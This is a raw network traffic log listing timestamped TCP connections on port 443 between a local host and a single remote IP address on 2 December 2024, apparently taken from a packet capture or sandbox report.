                                                          Dec 2, 2024 17:57:53.414840937 CET50005443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:53.414911985 CET50005443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:53.414928913 CET4435000513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:53.414938927 CET50005443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:53.414943933 CET4435000513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:53.417423010 CET50010443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:53.417459011 CET4435001013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:53.417562962 CET50010443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:53.417700052 CET50010443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:53.417714119 CET4435001013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:54.098298073 CET4435000713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:54.099220037 CET50007443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:54.099308014 CET4435000713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:54.099493980 CET50007443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:54.099509954 CET4435000713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:54.546634912 CET4435000713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:54.546660900 CET4435000713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:54.546708107 CET4435000713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:54.546713114 CET50007443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:54.546760082 CET50007443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:54.546892881 CET50007443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:54.546905994 CET4435000713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:54.546917915 CET50007443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:54.546922922 CET4435000713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:54.549613953 CET50011443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:54.549652100 CET4435001113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:54.549707890 CET50011443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:54.549891949 CET50011443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:54.549905062 CET4435001113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:54.630422115 CET4435000813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:54.630831003 CET50008443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:54.630851984 CET4435000813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:54.631304979 CET50008443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:54.631310940 CET4435000813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:55.062401056 CET4435000913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:55.062930107 CET50009443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:55.062964916 CET4435000913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:55.063390017 CET50009443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:55.063396931 CET4435000913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:55.097346067 CET4435000813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:55.100291014 CET4435000813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:55.100384951 CET50008443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:55.100864887 CET50008443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:55.100888968 CET4435000813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:55.100902081 CET50008443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:55.100908041 CET4435000813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:55.106197119 CET50012443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:55.106226921 CET4435001213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:55.106297016 CET50012443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:55.106432915 CET50012443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:55.106446981 CET4435001213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:55.209743977 CET4435001013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:55.210210085 CET50010443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:55.210227966 CET4435001013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:55.210902929 CET50010443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:55.210907936 CET4435001013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:55.507458925 CET4435000913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:55.510621071 CET4435000913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:55.510673046 CET4435000913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:55.510682106 CET50009443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:55.510729074 CET50009443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:55.510771990 CET50009443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:55.510790110 CET4435000913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:55.510799885 CET50009443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:55.510803938 CET4435000913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:55.513792992 CET50013443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:55.513833046 CET4435001313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:55.513905048 CET50013443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:55.514060020 CET50013443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:55.514075041 CET4435001313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:55.656352997 CET4435001013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:55.659985065 CET4435001013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:55.660047054 CET50010443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:55.660073996 CET50010443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:55.660098076 CET4435001013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:55.660110950 CET50010443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:55.660116911 CET4435001013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:55.662760019 CET50014443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:55.662796021 CET4435001413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:55.662856102 CET50014443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:55.662986040 CET50014443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:55.663000107 CET4435001413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:56.439271927 CET4435001113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:56.439827919 CET50011443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:56.439862967 CET4435001113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:56.440288067 CET50011443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:56.440293074 CET4435001113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:56.697479010 CET4435000613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:56.697942972 CET50006443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:56.697961092 CET4435000613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:56.698398113 CET50006443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:56.698402882 CET4435000613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:56.890511036 CET4435001213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:56.890953064 CET50012443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:56.890976906 CET4435001213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:56.891411066 CET50012443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:56.891418934 CET4435001213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:56.896730900 CET4435001113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:56.899713993 CET4435001113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:56.899794102 CET50011443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:56.899847984 CET50011443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:56.899873972 CET4435001113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:56.899885893 CET50011443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:56.899892092 CET4435001113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:56.902189016 CET50015443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:56.902240038 CET4435001513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:56.902312994 CET50015443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:56.902431011 CET50015443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:56.902440071 CET4435001513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:57.142596960 CET4435000613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:57.145762920 CET4435000613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:57.145829916 CET50006443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:57.235207081 CET50006443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:57.235236883 CET4435000613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:57.235268116 CET50006443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:57.235275030 CET4435000613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:57.244383097 CET50016443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:57.244441986 CET4435001613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:57.244524002 CET50016443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:57.244776011 CET50016443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:57.244790077 CET4435001613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:57.298492908 CET4435001313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:57.298882961 CET50013443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:57.298907042 CET4435001313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:57.299335957 CET50013443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:57.299340963 CET4435001313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:57.358330965 CET4435001213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:57.361493111 CET4435001213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:57.361552000 CET50012443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:57.361596107 CET50012443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:57.361612082 CET4435001213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:57.361622095 CET50012443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:57.361635923 CET4435001213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:57.363959074 CET50017443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:57.364012003 CET4435001713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:57.364073038 CET50017443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:57.364274979 CET50017443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:57.364290953 CET4435001713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:57.512306929 CET4435001413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:57.512794971 CET50014443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:57.512811899 CET4435001413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:57.513226032 CET50014443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:57.513230085 CET4435001413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:57.742861032 CET4435001313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:57.746491909 CET4435001313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:57.746531010 CET50013443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:57.746552944 CET4435001313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:57.746567011 CET4435001313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:57.746619940 CET50013443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:57.746680021 CET50013443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:57.746700048 CET4435001313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:57.746711969 CET50013443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:57.746716976 CET4435001313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:57.749233007 CET50018443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:57.749277115 CET4435001813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:57.749335051 CET50018443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:57.749490976 CET50018443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:57.749502897 CET4435001813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:57.966275930 CET4435001413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:57.969356060 CET4435001413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:57.969433069 CET50014443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:57.969479084 CET50014443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:57.969479084 CET50014443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:57.969500065 CET4435001413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:57.969510078 CET4435001413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:57.971983910 CET50019443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:57.972042084 CET4435001913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:57.972116947 CET50019443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:57.972259998 CET50019443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:57.972275972 CET4435001913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:58.683065891 CET4435001513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:58.683612108 CET50015443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:58.683636904 CET4435001513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:58.684058905 CET50015443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:58.684066057 CET4435001513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:59.090390921 CET4435001613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:59.090928078 CET50016443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:59.090970039 CET4435001613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:59.091367006 CET50016443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:59.091372013 CET4435001613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:59.186634064 CET4435001513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:59.186745882 CET4435001513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:59.186830997 CET50015443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:59.187019110 CET50015443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:59.187038898 CET4435001513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:59.187050104 CET50015443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:59.187056065 CET4435001513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:59.190059900 CET50020443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:59.190114021 CET4435002013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:59.190201998 CET50020443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:59.190375090 CET50020443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:59.190391064 CET4435002013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:59.232108116 CET4435001713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:59.232717991 CET50017443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:59.232744932 CET4435001713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:59.233174086 CET50017443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:59.233181000 CET4435001713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:59.549557924 CET4435001613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:59.549586058 CET4435001613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:59.549681902 CET50016443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:59.549743891 CET4435001613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:59.549820900 CET4435001613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:59.549874067 CET50016443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:59.549963951 CET50016443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:59.549983978 CET4435001613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:59.549998045 CET50016443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:59.550004959 CET4435001613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:59.552747011 CET50021443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:59.552791119 CET4435002113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:59.552866936 CET50021443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:59.552988052 CET50021443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:59.553004980 CET4435002113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:59.623738050 CET4435001813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:59.624231100 CET50018443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:59.624253035 CET4435001813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:59.624707937 CET50018443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:59.624712944 CET4435001813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:59.745510101 CET4435001713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:59.745630980 CET4435001713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:59.745711088 CET50017443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:59.745942116 CET50017443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:59.745960951 CET4435001713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:59.745973110 CET50017443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:59.745979071 CET4435001713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:59.748567104 CET50022443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:59.748604059 CET4435002213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:59.748686075 CET50022443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:59.748833895 CET50022443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:59.748847008 CET4435002213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:59.924926043 CET4435001913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:59.925549030 CET50019443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:59.925571918 CET4435001913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:59.925964117 CET50019443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:59.925970078 CET4435001913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:00.087708950 CET4435001813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:00.087729931 CET4435001813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:00.087790966 CET50018443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:00.087821007 CET4435001813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:00.088048935 CET50018443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:00.088064909 CET4435001813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:00.088074923 CET50018443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:00.088231087 CET4435001813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:00.088260889 CET4435001813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:00.088299990 CET50018443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:00.090748072 CET50023443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:00.090790987 CET4435002313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:00.090861082 CET50023443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:00.090998888 CET50023443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:00.091012001 CET4435002313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:00.369920015 CET4435001913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:00.369946003 CET4435001913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:00.370019913 CET50019443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:00.370043039 CET4435001913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:00.370261908 CET50019443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:00.370284081 CET4435001913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:00.370297909 CET50019443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:00.370450974 CET4435001913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:00.370484114 CET4435001913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:00.370532990 CET50019443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:00.372733116 CET50024443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:00.372781038 CET4435002413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:00.372855902 CET50024443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:00.373020887 CET50024443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:00.373047113 CET4435002413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:01.155168056 CET4435002013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:01.155745029 CET50020443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:01.155776024 CET4435002013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:01.156101942 CET50020443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:01.156106949 CET4435002013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:01.354439020 CET4435002113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:01.354928970 CET50021443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:01.354957104 CET4435002113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:01.355369091 CET50021443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:01.355374098 CET4435002113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:01.467964888 CET4435002213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:01.468375921 CET50022443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:01.468413115 CET4435002213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:01.468816042 CET50022443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:01.468821049 CET4435002213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:01.609150887 CET4435002013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:01.609175920 CET4435002013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:01.609385014 CET50020443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:01.609415054 CET4435002013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:01.613313913 CET4435002013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:01.613379955 CET50020443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:01.619568110 CET50020443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:01.619591951 CET4435002013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:01.619597912 CET50020443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:01.619606018 CET4435002013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:01.625495911 CET50025443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:01.625534058 CET4435002513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:01.625602961 CET50025443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:01.625881910 CET50025443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:01.625897884 CET4435002513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:01.789747000 CET4435002113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:01.789767981 CET4435002113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:01.789834976 CET50021443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:01.789855957 CET4435002113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:01.790205956 CET50021443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:01.790221930 CET4435002113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:01.790230036 CET50021443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:01.790371895 CET4435002113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:01.790402889 CET4435002113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:01.790438890 CET50021443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:01.810493946 CET50026443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:01.810533047 CET4435002613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:01.810602903 CET50026443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:01.810726881 CET50026443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:01.810743093 CET4435002613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:01.869980097 CET4435002313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:01.870556116 CET50023443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:01.870577097 CET4435002313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:01.871998072 CET50023443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:01.872005939 CET4435002313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:01.915635109 CET4435002213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:01.915700912 CET4435002213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:01.915750980 CET50022443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:01.915899992 CET50022443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:01.915923119 CET4435002213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:01.915935040 CET50022443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:01.915942907 CET4435002213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:01.919399023 CET50027443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:01.919426918 CET4435002713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:01.919487000 CET50027443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:01.919692993 CET50027443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:01.919722080 CET4435002713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:02.189459085 CET4435002413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:02.189961910 CET50024443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:02.189980030 CET4435002413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:02.190426111 CET50024443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:02.190432072 CET4435002413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:02.311042070 CET4435002313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:02.311120987 CET4435002313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:02.311178923 CET50023443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:02.311378956 CET50023443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:02.311397076 CET4435002313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:02.311408043 CET50023443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:02.311413050 CET4435002313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:02.314282894 CET50028443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:02.314312935 CET4435002813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:02.314394951 CET50028443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:02.314564943 CET50028443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:02.314578056 CET4435002813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:02.636689901 CET4435002413.107.246.63192.168.2.4
